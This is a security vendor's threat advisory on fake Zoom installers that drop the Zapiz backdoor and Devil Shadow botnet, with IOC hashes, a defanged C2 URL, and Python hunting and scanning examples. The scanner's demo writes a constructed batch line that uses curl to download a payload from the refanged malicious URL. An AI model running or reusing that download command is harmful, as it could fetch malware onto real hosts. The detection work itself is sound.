
Rewterz Threat Alert – Fake Zoom Installers Hiding Zapiz Backdoor and Devil Shadow

May 28, 2020

Severity

Medium

Analysis Summary

Researchers have analysed two malware-laced Zoom installers.

The first carries the Zapiz backdoor. The installer bundles several encrypted files that decrypt into a separate installer. Once running, the malware terminates any remote-access utilities it finds and opens port 5650 so the attacker can reach the host. It also writes four registry entries holding its configuration; these settings signal to the C2 that an email account has been set up, that credentials have been stolen, and that the infected machine is flagged as ready for remote access.

The second sample belongs to the Devil Shadow botnet. Its installer contains pyclient.cmd, which holds the malicious commands. A self-extracting archive drops a text file with the C2 server address and a URL, a batch file used for persistence, and a copy of the legitimate Zoom installer. One Visual Basic script executes the cmd files and a second one establishes persistence; all malicious files are dropped alongside the Zoom installer. The cmd file connects to the hosting URL and downloads the binaries used for follow-on activity. Finally, the legitimate Zoom installer is launched so that the victim sees a normal installation and does not suspect anything.
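The execution chain above (a downloaded "Zoom" installer launching a VBS, cmd.exe running the dropped pyclient.cmd, and a new listener on port 5650) can be turned into simple hunting rules. The following is an added example written for this advisory, not code from Rewterz or from the malware analysis; the process-creation and listener events it runs over are constructed for illustration, and the file paths and rule names are assumptions.

```python
"""Added example: behavioural hunt for the execution chain described in
the advisory (dropped pyclient.cmd run via cmd.exe, a VBS launched by a
downloaded Zoom installer, a listener on port 5650).  The telemetry below
is constructed for illustration, not real endpoint data."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str          # "process" (creation) or "listen" (new listening socket)
    image: str = ""    # full path of the executable
    cmdline: str = ""  # command line for process events
    parent: str = ""   # full path of the parent image
    port: int = 0      # listening port for "listen" events


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Constructed sample telemetry modelled on the advisory's description
# (paths are assumptions; the advisory does not give drop locations).
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\u\Downloads\ZoomInstaller.exe",
          "ZoomInstaller.exe", r"C:\Windows\explorer.exe"),
    Event("process", r"C:\Windows\System32\wscript.exe",
          r'wscript.exe "C:\Users\u\AppData\Local\Temp\run.vbs"',
          r"C:\Users\u\Downloads\ZoomInstaller.exe"),
    Event("process", r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\pyclient.cmd"',
          r"C:\Windows\System32\wscript.exe"),
    Event("listen", image=r"C:\Users\u\AppData\Roaming\updater.exe", port=5650),
    # Benign noise: the genuine client and an ordinary RPC listener.
    Event("process", r"C:\Program Files\Zoom\bin\Zoom.exe",
          "Zoom.exe", r"C:\Windows\explorer.exe"),
    Event("listen", image=r"C:\Windows\System32\svchost.exe", port=135),
]

PROGRAM_DIRS = ("c:\\program files", "c:\\program files (x86)")


def rule_pyclient_cmd(ev: Event) -> bool:
    """cmd.exe executing pyclient.cmd (file name taken from the advisory)."""
    return (ev.kind == "process" and _base(ev.image) == "cmd.exe"
            and "pyclient.cmd" in ev.cmdline.lower())


def rule_vbs_from_zoom_installer(ev: Event) -> bool:
    """A script host launched with a .vbs by a 'Zoom' binary that is not
    installed under Program Files, i.e. a downloaded installer."""
    if ev.kind != "process" or _base(ev.image) not in ("wscript.exe", "cscript.exe"):
        return False
    if ".vbs" not in ev.cmdline.lower():
        return False
    parent = ev.parent.lower()
    return "zoom" in _base(parent) and not parent.startswith(PROGRAM_DIRS)


def rule_port_5650_listener(ev: Event) -> bool:
    """New listener on port 5650 (the port Zapiz opens for remote access).
    Treat as a lead, not proof: other software may legitimately use it."""
    return ev.kind == "listen" and ev.port == 5650


RULES = {
    "pyclient_cmd": rule_pyclient_cmd,
    "vbs_from_zoom_installer": rule_vbs_from_zoom_installer,
    "port_5650_listener": rule_port_5650_listener,
}


def hunt(events: list[Event]) -> list[tuple[str, Event]]:
    """Return (rule name, event) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"{name:26} {ev.image}  {ev.cmdline or ev.port}")
```

Each rule alone is noisy (port 5650 in particular); the value is in seeing two or three of them fire on the same host within a short window of a Zoom installer being written to a user's Downloads directory, which is the pattern the advisory describes.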


Impact

  • Unauthorized remote access to the infected host (backdoor)
  • Credential theft
  • Exposure of sensitive data
  • Enrolment of the host in a botnet and download of further malicious binaries

Indicators of Compromise

SHA-256

  • 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
  • 57bf83837c18a75d2e7327cdf5bfdcc906ccf78d82237ec961a4f1bee85473cf
  • 9b6b1807f886bb9eccdc170988d6e419e4301c96817f362aca3d01df17c352fd
  • 90728a5b2f22460e1b28e3dc350a95b993a185a6170b4aa5e45b57834b90bcee
  • a26f3981ed3784bb86f5223bf14fb0047ff3fd86b8fc94753ce5a3f1702ebb56
  • 93bf084daddb10b3760f4e4424b1bc4d5d5590c30064045d01c8658a6fe50d3a
  • f01da52509792a52c6def452b3ee9b0b78acaca399341926fbe4f3212c42a55e
  • 5b7804919d437688c8811e85c54cb36efba72652bac8093833ca04b811ea87b7
  • 628928fe61e86d3b246a7822b1d1505d3694becc4a73e373f73653851d22f1a5
  • 65f725f380c9b90d409539b74bfbd8a57f0fa48843ee79838fa57ad28240feb5

URL

  • http[:]//hosting303[.]000webhostapp[.]com/devil_shadow

Remediation

  • Block the listed hashes and URL at your respective controls (web proxy, DNS, endpoint protection).
  • Obtain the Zoom client only from the vendor's official website or app stores; treat installers arriving by email, chat or third-party download sites as untrusted.
  • Always be suspicious of emails sent by unknown senders, and never click on the links or open the attachments they carry.
  • Hunt for the behaviours described above: unexpected listeners on port 5650, script hosts launched by a downloaded "Zoom" installer, and dropped batch or VBS files used for persistence.
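To act on the first remediation bullet, the hashes and the defanged URL from the Indicators of Compromise section can be matched against files on disk. The block below is an added example written for this advisory, not Rewterz's own tooling; the files it scans in demo() are constructed (none is a real sample), and the scan directory and output format are assumptions.

```python
"""Added example: match files under a directory against the advisory's
SHA-256 hashes and the defanged Devil Shadow URL.  The sample files in
demo() are constructed; none of them is an actual malware sample."""
import hashlib
import os
import tempfile

# SHA-256 indicators published in this advisory.
IOC_SHA256 = {
    "4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe",
    "57bf83837c18a75d2e7327cdf5bfdcc906ccf78d82237ec961a4f1bee85473cf",
    "9b6b1807f886bb9eccdc170988d6e419e4301c96817f362aca3d01df17c352fd",
    "90728a5b2f22460e1b28e3dc350a95b993a185a6170b4aa5e45b57834b90bcee",
    "a26f3981ed3784bb86f5223bf14fb0047ff3fd86b8fc94753ce5a3f1702ebb56",
    "93bf084daddb10b3760f4e4424b1bc4d5d5590c30064045d01c8658a6fe50d3a",
    "f01da52509792a52c6def452b3ee9b0b78acaca399341926fbe4f3212c42a55e",
    "5b7804919d437688c8811e85c54cb36efba72652bac8093833ca04b811ea87b7",
    "628928fe61e86d3b246a7822b1d1505d3694becc4a73e373f73653851d22f1a5",
    "65f725f380c9b90d409539b74bfbd8a57f0fa48843ee79838fa57ad28240feb5",
}

# URL indicator exactly as published (defanged).
IOC_URL_DEFANGED = "http[:]//hosting303[.]000webhostapp[.]com/devil_shadow"


def refang(url: str) -> str:
    """Turn the defanged form back into the literal string a dropper carries."""
    return url.replace("[:]", ":").replace("[.]", ".").replace("hxxp", "http")


def sha256_of(path: str) -> str:
    """Chunked SHA-256 so large installers do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_path(root: str) -> list[dict]:
    """Walk root; report hash matches and files embedding the C2 URL.
    The URL is checked as ASCII and as UTF-16LE, since Windows batch and
    VBS files may be saved in either encoding."""
    url = refang(IOC_URL_DEFANGED)
    needles = (url.encode("ascii"), url.encode("utf-16-le"))
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            digest = sha256_of(path)
            if digest in IOC_SHA256:
                findings.append({"path": path, "reason": "sha256", "value": digest})
            with open(path, "rb") as fh:
                data = fh.read()
            if any(n in data for n in needles):
                findings.append({"path": path, "reason": "c2_url", "value": url})
    return findings


def demo() -> list[dict]:
    """Build a throwaway directory holding a constructed pyclient.cmd that
    references the refanged URL plus a benign file, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "pyclient.cmd"), "w", encoding="utf-8") as fh:
            fh.write("@echo off\n")
            fh.write("rem constructed sample for the example, not the real dropper\n")
            fh.write(f"curl -o %TEMP%\\payload.bin {refang(IOC_URL_DEFANGED)}\n")
        with open(os.path.join(tmp, "readme.txt"), "w", encoding="utf-8") as fh:
            fh.write("nothing to see here\n")
        return scan_path(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['reason']:7} {f['path']}  {f['value']}")
```

On a real host, point scan_path at users' Downloads and Temp directories; a hash hit identifies one of the analysed installers, while a URL hit flags a dropped script or archive that references the Devil Shadow hosting location even if the outer installer has been repacked and its hash changed.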
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.